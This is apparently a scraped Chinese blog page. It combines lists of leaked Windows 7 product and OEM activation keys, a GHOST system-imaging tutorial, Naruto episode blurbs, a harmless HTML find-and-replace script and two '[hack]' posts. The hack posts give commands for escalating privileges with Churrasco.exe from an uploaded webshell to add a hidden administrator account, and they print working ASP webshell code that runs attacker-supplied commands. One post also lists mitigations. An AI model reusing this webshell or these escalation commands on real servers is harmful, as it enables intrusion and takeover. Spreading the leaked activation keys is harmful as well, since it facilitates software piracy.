37X8Q-CJ46F-RB8XP-GJ6RK-RHYT7
GDK6B-87QP9-F9WYK-PP327-BQ622
72C8D-KQ9Y4-FGBCD-WY9WG-BD92C
GV7X4-92M4D-6F69V-RFGP9-3FBBD
4JCWB-FVHJJ-XCPKC-CTWDP-QQQ9M
WXM3Y-H2GDY-TKFQH-6GQQF-7VG8P
V6V3G-9DB2T-BD4VC-44JVQ-6BVR2
MD83G-H98CG-DXPYQ-Q8GCR-HM8X2
VTKM9-74GQY-K3W94-47DHV-FTXJY
YGFVB-QTFXQ-3H233-PTWTJ-YRYRV



Windows 7 Starter Retail
D4C3G-38HGY-HGQCV-QCWR8-97FFR
BRQCV-K7HGQ-CKXP6-2XP7K-F233B
7Q28W-FT9PC-CMMYT-WHMY2-89M6G

軟體名稱: 微軟 Windows 7 Starter Edition
語系版本: 英文DVD版
光碟片數: 單片裝 (單面DVD)
安裝序號: BQXR3-84D93-G2RK7-HDKH2-X938C




Windows 7 Enterprise Retail
BQ4TH-BWRRY-424Y9-7PQX2-B4WBD
H3V6Q-JKQJG-GKVK3-FDDRF-TCKVR
H7X92-3VPBB-Q799D-Y6JJ3-86WC6 cn


Windows 7 Professional or Enterprise (MAK)
7RWBY-WT9KY-3BDJ2-9PYWC-GXKTP
XF6B9-DQGTB-XHVPR-JTD9F-QGDDW


Windows 7 Ultimate: 7YWX9-W3C2V-D46GW-P722P-9CP4D
Windows 7 Professional: VTDC3-WM7HP-XMPMX-K4YQ2-WYGJ8
Windows 7 Home Premium: V2HHT-47JXK-3YMXJ-9MCH3-RYQGW
Windows 7 Home Basic: BMDHM-HCRHH-JFBC8-9R8DT-YQB23r
Windows 7 Starter or Small Notebook: BQXR3-84D93-G2RK7-HDKH2-X938C



-----------------------------------------

B Windows7 OEM 密钥汇总
1 Windows 7 旗舰版 OEM密钥:
戴尔 342DG-6YJR8-X92GV-V7DCV-P4K27
联想 22TKD-F8XX6-YG69F-9M66D-PMJBM
宏基 FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
三星 49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD

6K2KY-BFH24-PJW6W-9GK29-TMPWP
2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G

联想Windows7简体中文旗舰版(32位)最新 OEM密钥

2 Windows 7 专业版 OEM密钥:
宏基 YKHFT-KW986-GK4PY-FDWYH-7TP9F
戴尔 32KD2-K9CTF-M3DJT-4J3WC-733WD
惠普 74T2M-DKDBC-788W3-H689G-6P6GT
三星 GMJQF-JC7VC-76HMH-M4RKY-V4HX6
索尼 H9M26-6BXJP-XXFCY-7BR4V-24X8J
2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW

3 Windows 7 家庭高级版 OEM密钥:

Asus 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG
2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR
戴尔 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82
惠普 4FG99-BC3HD-73CQT-WMF7J-3Q6C9
三星 CQBVJ-9J697-PWB9R-4K7W4-2BT4J
索尼 H4JWX-WHKWT-VGV87-C7XPK-CGKHQ
东芝 6B88K-KCCWY-4F8HK-M4P73-W8DQG
6GF36-P4HWR-BFF84-6GFC2-BWX77

Packard Bell?? VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7

4 Windows 7 简易版 OEM密钥:
戴尔 36Q3Y-BBT84-MGJ3H-FT7VD-FG72J
惠普 RH98C-M9PW4-6DHR7-X99PJ-3FGDB
RDJXR-3M32B-FJT32-QMPGB-GCFF6
东芝 TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ

PKRD7-K8863-WY28P-3YQGW-BP2CY
YRDY3-MPVD4-GYRVY-QKBGP-M7Y3Y
PR93X-CRDGQ-D83PK-VYFC6-86TW2
BG2KW-D62DF-P4HY6-6JDPD-DYK3W
V2Q3D-V8VXJ-YQVW6-F2CRQ-4JH64
PKRHK-6622Q-T49PV-CC3PX-TRX2Y
YDMGR-MYQ3R-4XKRK-VHPDK-H7BY2
GXRHM-CGB6Y-4WRD9-KFD7C-QXQ2B
C7KYW-CBKVC-DPC82-7TPKD-Y8T2C


5 Windows 7中文版 OEM密钥:
32位 windows 7中文版激活码:
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY

64位 windows 7中文版激活码:

JYDV8-H8VXG-74RPT-6BJPB-X42V4
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
482XP-6J9WR-4JXT3-VBPP6-FQF4M
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
7XRCQ-RPY28-YY9P8-R6HD8-84GH3

6 以下未知版本

C6MHH-TRRPT-74TDC-FHRMV-XB88W - 富士通
862R9-99CD6-DD6WM-GHDG2-Y8M37
PT9YK-BC2J9-WWYF9-R9DCR-QB9CK
36T88-RT7C6-R38TQ-RV8M9-WWTCY - 戴尔

导入"OEM密钥"方法(示例):
1、以"管理员身份"运行"命令提示符";

22键入slmgr.vbs -ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx

"OEM密钥"只对"相应"Windows 7版本,不会"挑剔"计算机品牌。



------------------------
Windows 7专业版、企业版的"MAK密钥":

49CGJ-4MTTF-WCM4W-K8WMG-3G2VT

* 已泄露可用于激活的OEM SLP序列号

Windows 7 初级版
RDJXR-3M32B-FJT32-QMPGB-GCFF6 --- XXXXX-OEM-8992752-30004 --- ACER
36Q3Y-BBT84-MGJ3H-FT7VD-FG72J --- XXXXX-OEM-8992707-00082 --- DELL
RH98C-M9PW4-6DHR7-X99PJ-3FGDB --- XXXXX-OEM-8992752-30008 --- HP
TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ --- XXXXX-OEM-8992752-30015 --- TOSHIBA

Windows 7 家庭高级版
VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 --- XXXXX-OEM-8992687-00006 --- PACKARD BELL
2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR --- XXXXX-OEM-8992687-00007 --- ASUS
7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG --- XXXXX-OEM-8992687-00118 --- ASUS (Eee)
6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 --- XXXXX-OEM-8992687-00095 --- DELL
4FG99-BC3HD-73CQT-WMF7J-3Q6C9 --- XXXXX-OEM-8992687-00010 --- HP
CQBVJ-9J697-PWB9R-4K7W4-2BT4J --- XXXXX-OEM-8992687-00015 --- SAMSUNG
H4JWX-WHKWT-VGV87-C7XPK-CGKHQ --- XXXXX-OEM-8992687-00016 --- SONY
6B88K-KCCWY-4F8HK-M4P73-W8DQG --- XXXXX-OEM-8992687-00057 --- TOSHIBA
6GF36-P4HWR-BFF84-6GFC2-BWX77 --- XXXXX-OEM-8992687-00017 --- TOSHIBA

Windows 7 专业版
YKHFT-KW986-GK4PY-FDWYH-7TP9F --- XXXXX-OEM-8992671-00004 --- ACER
32KD2-K9CTF-M3DJT-4J3WC-733WD --- XXXXX-OEM-8992671-00524 --- DELL
74T2M-DKDBC-788W3-H689G-6P6GT --- XXXXX-OEM-8992671-00008 --- HP
GMJQF-JC7VC-76HMH-M4RKY-V4HX6 --- XXXXX-OEM-8992671-00013 --- SAMSUNG
H9M26-6BXJP-XXFCY-7BR4V-24X8J --- XXXXX-OEM-8992671-00014 --- SONY

Windows 7 旗舰版
FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 --- XXXXX-OEM-8992662-00006 --- ACER
342DG-6YJR8-X92GV-V7DCV-P4K27 --- XXXXX-OEM-8992662-00400 --- DELL
22TKD-F8XX6-YG69F-9M66D-PMJBM --- XXXXX-OEM-8992662-00497 --- LENOVO (已封)
49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD --- XXXXX-OEM-8992662-00015 --- SAMSUNG

微软公开的特殊Windows 7序列号

默认安装的序列号(无法激活):
* 旗舰版 - D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV
* 专业版 - HYF8J-CVRMY-CM74G-RPHKF-PW487
* 家庭高级版 - RHPQ2-RMFJH-74XYM-BH4JX-XM76F
* 家庭普通版 - YGFVB-QTFXQ-3H233-PTWTJ-YRYRV
* 初级版 - 7Q28W-FT9PC-CMMYT-WHMY2-89M6G
KMS客户端设置序列号(GVLK):
* 专业版 - FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
* 专业版N - MRPKT-YTG23-K7D7T-X2JMM-QY7MG
* 企业版 - 33PXH-7Y6KF-2VJC9-XBBR8-HVTHH
* 企业版N - YDRBP-3D83W-TY26F-D46B2-XCKRJ

原文址址: http://www.verycd.com/groups/PPMM1999/796063.topic

GHOST系统封装详细图文教程[完整版](适合初学者)

2010年8月26日星期四 | | 0 评论 |

看到很多会员说封装时出现各种各样的问题,感觉还是因为看的封装教程太多,封装工具也太多、太乱,都不知道该怎么具体操作了,所以会出现这样那样的错误。本人就将自己的封装经验写出来分享一下。
    本文中涉及的文章及帖子,可能部分会员无法阅读,如果是这种情况,请你努力发表有意义的帖子,达到中级会员,这样就可以阅读了。对你造成的不便还请谅解!
教程架构:
第一篇 系统、工具及软件安装
第二篇 封装工具选择及实战
第三篇 光盘ISO文件制作
    下面以封装制作GHOSTXPSP3为例,进行讲解!

第一篇 系统、工具及软件安装


      一、准备工作
    1、操作系统选择:建议采用微软官方的VOL原版
    ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活!
    ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。
详情可以参阅帖子:
Windows_XP_Service_Pack_3_X86_CD_VOL_CN微软官方原版下载
  
    2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载
    如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集——系统之家,每月都有更新!
    也可以使用360安全卫士下载,然后收集整理。
  3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软件,也建议采用微软原版,不要使用修改版。
  
  Microsoft Office 2003_vol原版下载

  Microsoft Office 2003 Service Pack 3下载

  2007 office system格式兼容文件下载
4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本!
    推荐下载
    二、系统安装
    1、微软官方原版系统安装过程图解
        补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用PS/2鼠标操作!
        系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE补丁就不是很完整。
    2、系统主题屏保安装:
    首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序

        然后是安装系统主题
三、系统设置
——这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。
  
  1、设置任务栏:建议按如下图进行设置

2、任务栏快捷图标建议保留三个(如下图)

3、系统属性设置:
A)远程设置——把两个勾都去掉


B)自动更新设置——关闭自动更新


C)系统还原设置——关闭系统还原


D)高级设置:
  性能选项——选图示的三项就行了





  启动和故障恢复——全部把勾去了





  错误汇报——选第一个就OK啦





E)硬件设置 :
  驱动签名设置——忽略并设置为默认





  windows update——设置为从不,并确定


  


  4、msconfig启动项设置:
  服务设置——隐藏微软的服务,其余全部禁用





  启动项设置——勾选一个ctfmon,其余全部去掉勾






  5、使用gpedit.msc命令进行的设置:
开始——运行,输入gpedit.msc,回车——弹出"组策略"对话框,分别对以下选项进行设置:
1)本地计算机策略——计算机配置——管理模板——系统——"关闭windows update设备驱动程序搜索提示":启用
  本地计算机策略——计算机配置——管理模板——系统——"关闭自动播放":启用      可根据需要设置,建议启用!
  本地计算机策略——计算机配置——管理模板——系统——Internet通信管理——Internet通信设置————"关闭windows update设备驱动程序搜索":启用


2)本地计算机策略——用户配置——管理模板——系统——"关闭windows update设备驱动程序搜索提示":启用
  
  本地计算机策略——用户配置——管理模板——系统——"设备驱动程序的代码签名":禁用
  本地计算机策略——用户配置——管理模板——系统——"关闭自动播放":启用      可根据需要设置,建议启用!

  
  6、还有输入法设置、桌面属性设置、OEMLOGO信息设置、不常用的桌面图标的清理等等。
  四、封装前的优化与减肥
    这里有两篇文章,根据自己情况体会。——建议初学者不要进行太多的精简与减肥!以封装成功为主要目的。还有不清楚的请看视频教程
http://v.youku.com/v_show/id_XMTQzMDA4ODA4.html
第二篇 封装工具选择及实战



    以上工作做好后就准备开始封装了。在封装之前建议先对系统进行备份,如果封装失败,可以直接使用封装前的备份进行重新封装。这就不是二次封装了。
一、封装前的准备工具
  首先是准备自己习惯操作的封装工具及配套工具,根据不同封装工具,配套使用的工具也会不一样。这里我就以本论坛的3.9封装工具为例进行准备。
1、Jm_智能一键封装工具v3.9  下载


2、Dllcache备份恢复工具  下载

3、系统封装用驱动包  很多人喜欢提取别人做好的系统中的驱动,这不失为一种便捷的方法。根据自己喜欢,想用哪个的驱动就用哪个的驱动。我这里用自由天空的8.08
4、部署安装时的背景图,640*480_setup.bmp
5、OEMLOGO信息——如果前面没有加入,那么这时准备好请看详细操作
6、压缩文件打包制作工具 7-ZIP绿色版(附件2)及7Z文件自动安装制作工具(附件3)
  ——有几个用处:
    一是将安装设置在D盘的程序文件及目录文件打包;
    二是压缩C盘程序文件夹
7、首次进入桌面运行的程序:驱动删除工具、分辨率设置工具等
8、注册组件时运行的程序:DX更新程序、CPU双核补丁等
9、可以在DOS下运行GHOST的带PE系统的启动光盘  下载
二、系统封装准备
1、制作安装设置在D盘的程序文件压缩包
    我在安装中,QQ、360safe这两个工具软件装到D盘根目录,我的文档也转移到D盘目录,收藏夹、桌面设置在我的文档里面,于是D盘需要打包的文件有三个文件夹。
1)首先运行7-ZIP绿色版,找到需一起打包的三个文件夹,按CTRL键把三个文件夹选中,

  

点击添加按钮



2)选择7Z压缩包文件存放位置并设定极限压缩






  

    上面我们把D盘的文件用7Z工具制作好了压缩包,但是有的封装工具不支持7Z压缩包解压参数,或者有的初学者不会写批处理自动调用,那么我们就用一个工具把7Z格式的文件制作成EXE文件,并让它自动解压到D盘
  打开SfxMaker7Zip工具,

  



选择刚才做的7Z压缩包



然后我们可以设置解压时的界面外观






然后开始转换
下图就是部署时调用的EXE文件解压时的界面


2、制作C盘程序文件夹压缩包——这个可以根据需要而定,如果制作精简版GHOST系统,而精简后系统文件大了点,GHOST -Z9又超过700MB一点点,那么可以进行此项操作,目的就是让GHO文件保证在650M左右。而如果你没精简,或者精简不到位,就算把C盘程序文件夹高压缩,可能GHOST -Z9后还会超过700M,这就没必要啦。初学者建议不要做精简,以封装成功为首要任务!
  
3、将事先制作好的部署背景用图setup.bmp(640*480)复制到c:\windows\system32目录下;
  将改编好的OEMLOGO信息文件复制到c:\windows\system32目录下。



7Z自动安装制作工具+7-ZIP绿色版+XP精简教程下载
如果需要工具的请在百度自己找找 。希望能带给大家帮助
姐妹技术智能一键封装工具 v 4.0 - 完美版+封装图文教程   

★智能一键封装工具 v 4.0 - 完美版
★友情提醒:不支持部分精减版系统做母盘封装,删除硬件驱动建议手工删除!
★作者:深度空间

★感谢大家对【深度空间】支持和厚爱!

感谢姐妹技术官方提供电信100M光纤迅雷高速下载:


http://iso.itjmz.cn/jm_v4.0.rar










  







姐妹论坛驱动包(含驱动判断工具)Jm-Drivers2.1下载
  
其实网上有很多教材,我这里的只是拿了几个不同的教材给大家分享。 需要工具的如果我这里没有的 请在百度自己找找。
智能一键封装工具 v 4.0微软版 By深度空间 |+系统封装语音视频教程
运行环境:XP/2003/Vista/
软件语言:简体中文
软件类型:国产软件 - 系统工具 -
备份还原
授权方式:免费版
软件大小:39.3 MB
更新时间:2008-12-18 01:14:14

* 保持原来的 智能一键封装工具V4.0-完美版 的所有功能,在此基础上修正了大量的错误,并且添加了最新 的一些元素,也许没有完美

,但是我们尽力做得更加完美!
      *智能一键封装工具v4.0 - 微软版  
更新大量SP3的电源文件,能自动识别2000 2003 xp,SP2和SP3系列文件、更能
      
*最完美的支持2000 2003 xp,,SP2和SP3封装!
      1、一键快速封装

      2、部署接口设置(支持 无限的部署接口、支持 删除驱动包文件夹)

      3、DIYOEM设置(喜欢个人信息的朋友不防简单设置一下)

      4、IP设置及系统减肥(快速添加了 关闭系统还原!但也可以用手动来执行!)

      5、智能驱动解压(这个驱动工具能支持格式: 7z\rar\exe\com\bat\cmd\
、并能自动判断 显卡
和 声卡!) 最主要的是 全可以自定义LOGO图的!还集成最新 Dllcache实用工具V2.0 也可以自定义标题 和LOGO图!

      右键增加了加载外部辅助工具:减肥,注册表优化,并发连接数修改,保存输入法设置等等功能应
有尽有。
    ※ 相对于原来的 智能一键封装工具V4.0完美版本更新:
*.本工具 支持 JM驱动
2.2  采用天空的 SRS 2.6
*.可以支持 不同的 分辨率!
*.自定义 标题!首次进入 支持 REG 的导入!

*.保持和原微软版界面相同!
*.支持 无限的部署接口!
   

      1、更新海量的 SRS 驱动程序和注册表。

      2、智能驱动程序判断模式,智能释放并安装驱动。

      3、在不同的安装时间,添加了更多的程序调用接口。

      4、驱动解压:支持了更多的驱动包格式,并且支持压缩比最大的7zip格式,视频教程就是以自由

的风收集整理的驱动为范例制作的。
      5、清理多余的驱动服务更迅速可靠。

      6、能够清理更多的流行病毒。
   
集合了封装时所需要做到的每一个步骤,全智能封装,让你一键轻松搞定一切。
      

       7、更多功能及详细使用请观看语音视频封装教程。

   
★鸣谢:冰☆夕 封装内部工具—【Dllcache实用工具V2.0_注册表编辑工具】

         
   

★智能一键封装工具 v 4.0 微软版
★友情提醒:不支持部分精减版系统做母盘封装,删除硬件驱动建议手工删除!
★作者:深度空间


点这里下载 → 迅雷高速下载1[第一更新]

点这里下载 → 迅雷高速下载2[江苏电信]
点这里下载 → 四川电信下载6
点这里下载 → 广东电信下载8
点这里下载 → 广东阳江下载12
点这里下载 → 郑州网通下载13
 
参考:http://bbs.deepin.org/viewthread.php?tid=1640569

在线动漫视频[火影忍者]Naruto 第395集「木叶的英雄」 抢新版

| | 0 评论 |

最新动漫视频[火影忍者]Naruto 第395集「木叶的英雄」 抢新版 在线观看

中文字幕 - 火影在线观看 - 实时更新 - 精彩不断


[火影忍者]Naruto 第395集「木叶的英雄」 剧情介绍:

被鸣人的选择感动,准备将一切托付给他的长门使出最后的大术「外道·轮回转生之术」。这是用长门的生命作为交换,换回在这场战斗中丢掉性命的忍者们灵魂的禁断之术。准备带着长门和弥彦的遗体离开的小南,鸣人继承了弥彦和长门的梦想,满怀着师父和师兄的期望,向小南约定要争取到和平的世界。




火影忍者 火影忍者 中文网 :http://naruto-cn.1ve.info

我们一直在努力, 用心做好您心目中最好的 : 火影忍者Naruto中文网
naruto, 在线动漫, 鸣人, 佐助, 火影忍者, 动漫视频,在线观看,在线视频

在线动漫视频[火影忍者]Naruto 第394集「漩涡鸣人物语」 抢新版

2010年8月20日星期五 | | 0 评论 |

最新动漫视频[火影忍者]Naruto 第394集「漩涡鸣人物语」 抢新版 在线观看

中文字幕 - 火影在线观看 - 实时更新 - 精彩不断


[火影忍者]Naruto 第394集「漩涡鸣人物语」 剧情介绍:

被佩恩讲述的痛楚震撼,惊呆的鸣人。这被诅咒的世界中根本不存在和平,自来也所说的话根本不切实际。长门抛出这些话催促鸣人快些作答。
聆听了一切的鸣人将作出怎样的回答。。。?愤怒不断否定鸣人长门的脑中,回忆起了很久之的已经被遗忘的和自来也的对话。




火影忍者 火影忍者 中文网 :http://naruto-cn.1ve.info

我们一直在努力, 用心做好您心目中最好的 : 火影忍者Naruto中文网
naruto, 在线动漫, 鸣人, 佐助, 火影忍者, 动漫视频,在线观看,在线视频

[code]有查找替换功能的Html代码[备用]

2010年8月18日星期三 | | 0 评论 |

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> New Document </TITLE>
<SCRIPT LANGUAGE="JavaScript">
var oRange;     // save the current textrange 
var intCount = 0;   // this pos of current textrange in the total count
var intTotalCount = 0;  // total count
<!--
//==============================================
//function : fnSearch()
//comment  : Search the text
//param    : none
//return   : none
//author   : Fantiny
//Date     : 10/21/2005
//==============================================
function fnSearch() {
 var strBeReplaced;
 var strReplace;
 strBeReplaced = fm1.txtarea2.value;
 strReplace = fm1.txtarea3.value;
 fnNext();
 fm1.txtarea1.focus();
 oRange = fm1.txtarea1.createTextRange(); //Create a textRange for the Textarea
 
 // Find the text by findtext method
 for (i=1; oRange.findText(strBeReplaced)!=false; i++) {
  if(i==intCount){  
   oRange.select();   // select the finded text
   oRange.scrollIntoView(); // scroll the page and set the text Into View
   break;
  }
  oRange.collapse(false);   //
 }
}
//==============================================
//function : fnSearch()
//comment  : set the flag to the next textrange
//param    : none
//return   : none
//author   : Fantiny
//Date     : 10/21/2005
//==============================================
function fnNext(){
 if (intCount > 0 && intCount < intTotalCount){
  intCount = intCount + 1;
 }
 else{
  intCount = 1 ;
 }
}
//==============================================
//function : init()
//comment  : initialize at page onload to get the count
//param    : none
//return   : none
//author   : Fantiny
//Date     : 10/21/2005
//==============================================
function init(){
 var oRange ;
 var strBeRepalced;
 oRange = fm1.txtarea1.createTextRange();  //Create a textRange for the Textarea
 strBeReplaced = fm1.txtarea2.value;   
 for (i=0; oRange.findText(strBeReplaced)!=false; i++) {
     oRange.collapse(false);  // Moves the insertion point to the end of the text range.
 }
 intTotalCount = i ;
}
//==============================================
//function : fnReplace()
//comment  : replace the text of the selected textrange
//param    : none
//return   : none www.knowsky.com
//author   : Fantiny
//Date     : 10/21/2005
//==============================================
function fnReplace(){
 var strReplace;
 
 strReplace = fm1.txtarea3.value;
 // if the textrange is exist, replace the text
 if(oRange!= null && typeof(oRange)=="object" && intTotalCount > 0){
  oRange.text = strReplace;
  intCount = intCount - 1;
  intTotalCount = intTotalCount - 1;
  oRange = null;
 }
}
//-->
</SCRIPT>
</HEAD>
<BODY onload="init()">
<FORM METHOD=POST name="fm1">
<TEXTAREA NAME="txtarea1" ROWS="20" COLS="50">
this is the original text, and this is the string will be repalced.
this is the original text, and this is the string will be repalced.
this is the original text, and this is the string will be repalced.
this is the original text, and this is the string will be repalced.
this is the original text, and this is the string will be repalced.
this is the original text, and this is the string will be repalced.
</TEXTAREA>
<TEXTAREA NAME="txtarea2" ROWS="20" COLS="50"> will be </TEXTAREA>
<TEXTAREA NAME="txtarea3" ROWS="20" COLS="50"> has been </TEXTAREA>
<input type="button" value="search" onclick="fnSearch()">
<input type="button" value="Replace" onclick="fnReplace()">
</FORM>
</BODY>
</HTML>
  
参考:
我的QQ空间
用Churrasco.exe进行提权的方法(附下载地址)
说起WebShell提权的方法网上文章是多得所处可见!那么在这里我写...
 

[hack]教你用本地漏洞Windows Token Kidnapping进行网站提权

| | 0 评论 |

话说很久很久没有爆过Windows下比较有影响的漏洞了,这回终于微软也可爱了一回,爆了个可以让大家爽歪歪的本地权限提升漏洞。如果你手里有一大批以前提不了权限的Webshell的话,看完本文之后就赶紧拿出来提权去,效果还是蛮不错的。因为微软并没有修补这一漏洞,只是在安全公告里做了提醒(详见 http://www.microsoft.com/technet/security/advisory/951306.mspx)。

  受此漏洞影响的系统:

  Windows XP Professional Service Pack 2

  Windows XP Professional Service Pack 3

  Windows Server 2003

  Windows Vista

  Windows Server 2008

  漏洞信息:

  Microsoft Windows是一款流行的操作系统。漏洞是由于在NetworkService或LocalService上运行的代码,可以访问同样是在 NetworkService或LocalService上运行的进程,部分进程允许提升权限到LocalSystem。对于IIS,默认安装是不受影响的,但以Full Trust运行的ASP.NET代码受此漏洞影响,如果权限低于Full Trust,也不受此漏洞影响。同样ASP代码不受此漏洞影响,只有ASP.NET才受影响。针对SQL Server,如果用户以administrative权限运行代码,则受此漏洞影响。针对Windows Server 2003,攻击者可以通过MSDTC获取token访问其他同样token的进程,从而提升权限。任何具有SeImpersonatePrivilege 的进程都有可能造成权限提升。

  漏洞相关描述就先看这么多了,本地权限提升嘛,当然前提是你要能访问到Windows,比如你已经获得了目标的一个Webshell,而且这个目标支持ASP.NET程序,而你又能够执行命令,那么基本上这台服务器就跑不掉了(当然还得人家没做相应的安全设置,因为这个洞也是可以防的嘛)。

  一、攻

  耳听为虚,眼见为实。那我们就来实地演练一下这个漏洞到底有多么的酷!

  测试环境:

  操作系统:Microsoft Windows Server 2003 Enterprise Edition Service Pack 2(已更新所有补丁)

  IIS版本:IIS 6.0

  ASP.NET版本:Microsoft.NET Framework 1.1

  如图1。

                     教你用本地漏洞Windows <wbr>Token <wbr>Kidnapping进行网站提权 

  添加IIS支持.NET程序,然后在WEB目录放一个ASPX的Webshell。为了方便演示,直接使用ASPX脚本,其实用ASP的 Webshell也是可以的,前提是要目标支持ASPX(当前目录不支持也不要紧,ASP的Webshell能执行命令都不妨一试),而且 Webshell是可以执行命令的,如图2。

                        教你用本地漏洞Windows <wbr>Token <wbr>Kidnapping进行网站提权 

  然后就把利用程序上传到WEB目录(老外公布的东西,有源代码,编译好的利用工具和源代码都会打包在光盘里),然后就可以执行提权操作了。执行如下命令:

  ●/c D:\wwwroot\Churrasco.exe "net user hackest estidc.com /add"●

  Churrasco.exe是利用工具名,后面是要执行的命令,注意要用英文双引号括住。稍等一下之后返回执行结果,可以看到提示成功了,当然不同的环境PID可能不一样,如图3。

                                   教你用本地漏洞Windows <wbr>Token <wbr>Kidnapping进行网站提权

再看看是否真的成功添加了用户,这回放心了吧,证实已经成功添加了用户hackest,如图4。

                             教你用本地漏洞Windows <wbr>Token <wbr>Kidnapping进行网站提权 

  要添加进管理员组就执行如下命令:

  ●/c D:\wwwroot\Churrasco.exe "net localgroup administrators hackest /add"●

  然后就可以看到用户hackest已经老老实实地躲在管理员组里了,如图5。

                         教你用本地漏洞Windows <wbr>Token <wbr>Kidnapping进行网站提权 

  利用相当的简单吧,出乎你的意料?本地权限提升就是这么帅!利用就基本介绍完了,注意命令格式就可以了。

  二、防

  下面再介绍下怎么防止被黑客利用该漏洞胡作非为。

  IIS管理员可参考如下临时解决方案:

  在IIS管理器中使用建立一个已建立帐户,为IIS中为应用程序池配置WPI,并禁用MSDTC(Microsoft Windows Distributed Transaction Coordinator)。

  IIS 6.0:

  IIS6.0下可以按如下操作为应用程序池指定WPI:

  Internet 信息服务(IIS)管理器->本地计算机->应用程序池->右键点击"应用程序池"->选择"属性"->点击"标识"- >点击"配置"->在"用户名"和"密码"栏里输入工作进程要操作的帐户的用户名和密码->添加选择的用户到IIS_WPG组。

  禁用MSDTC可帮助保护受影响系统不被此漏洞利用,要禁用MSDTC,可执行如下步骤:

  点击"开始"->"控制面板"->"管理工具"->"服务",在弹出的服务管理界面,找到"Distributed Transaction Coordinator"项并双击打开属性对话框,在"启动类型"列表中选择"禁用"。如果服务已启动,停止该服务,然后点击确定退出。也可以在CMD窗口里使用如下命令停止和禁用MSDTC服务:

  ●sc stop MSDTC & sc config MSDTC start= disabled●

  IIS 7.0:

  IIS7.0下可以使用命令行工具appcmd.exe为应用程序池指定WPI:

  在CMD中,更改至%systemroot%\system32\inetsrv目录,使用如下语法执行appcmd.exe命令,string是应用程序池名,username是指定给应用池帐户的用户名,password字符串是帐户密码:

  ●

  appcmd set config /section:applicationPools /

  [name='string'].processModel.identityType:SpecificUser /

  [name='string'].processModel.userName:string /

  [name='string'].processModel.password:string

  ●

  注:应用程序池身份标识在IIS7中动态添加到IIS_WPG组中,无需手动添加。

参考:http://blog.sina.com.cn/s/blog_5f64b3b20100cu40.html
 
我的QQ空间
用Churrasco.exe进行提权的方法(附下载地址)
说起WebShell提权的方法网上文章是多得所处可见!那么在这里我写...
 

[hack]用Churrasco.exe进行提权的方法(附下载地址)

| | 0 评论 |

说起WebShell提权的方法网上文章是多得所处可见!
那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验!
方法如有不对的请大家多多指点!
提权时要到的工具如下:cmd.exe Churrasco.exe nc.exe
用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!
代码如下 :

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="net user"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="C:\RECYCLER\cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea>

将以上代码保存为cmd.asp上传到SHELL里 再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!
下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现

/churrasco/–>Current User: NETWORK SERVICE
/churrasco/–>Getting Rpcss PID …
/churrasco/–>Found Rpcss PID: 696
/churrasco/–>Searching for Rpcss threads …
/churrasco/–>Found Thread: 444
/churrasco/–>Thread not impersonating, looking for another thread…
/churrasco/–>Found Thread: 700
/churrasco/–>Thread not impersonating, looking for another thread…
